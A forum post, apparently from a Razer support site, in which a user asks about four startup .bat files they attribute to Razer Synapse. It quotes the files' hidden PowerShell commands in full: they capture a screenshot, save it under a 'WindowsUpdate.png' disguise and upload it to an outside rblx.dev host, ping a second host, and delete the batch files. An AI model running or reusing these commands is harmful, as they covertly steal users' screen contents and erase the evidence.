i had this 4 .bat files created on start run with weird code powershell that send info to a remote server.
after downloading and installing fresh copy of windows, i found out its Razer Synapse that create those files
do its look really suspension
here is a topic that have all the info:
https://security.stackexchange.com/questions/207769/installed-a-fresh-copy-of-win10-and-i-have-powershell-script-sending-info-to-htt#comment418996_207769
after sync for the first time its create 4 bat files with those codes:
LVTUSIX.bat:
powershell -windowstyle hidden -Command "[void][reflection.assembly]::loadwithpartialname('system.windows.forms'); [system.windows.forms.sendkeys]::sendwait('{PRTSC}'); Get-Clipboard -Format Image | ForEach-Object -MemberName Save -ArgumentList "$env:APPDATA\\WindowsUpdate.png"; invoke-webrequest -method put -infile "$env:APPDATA\\WindowsUpdate.png" https://rip.rblx.dev/c/"
LVTUSIXd.bat:
powershell -windowstyle hidden -Command "[void][reflection.assembly]::loadwithpartialname('system.windows.forms'); [system.windows.forms.sendkeys]::sendwait('{PRTSC}'); Get-Clipboard -Format Image | ForEach-Object -MemberName Save -ArgumentList "$env:APPDATA\\WindowsUpdate.png"; invoke-webrequest -method put -infile "$env:APPDATA\\WindowsUpdate.png" https://rip.rblx.dev/c/"
LVTUSIXdd.bat:
powershell -windowstyle hidden -Command "& {&invoke-webrequest -method get https://c.rblx.dev/c/}
LVTUSIXddx.bat:
del *.bat
what are those powershell code to this rblx.dev ?
This topic has been closed for comments
Sign up
Already have an account? Login
Log in with Razer ID to create new threads and earn badges.
LOG INEnter your username or e-mail address. We'll send you an e-mail with instructions to reset your password.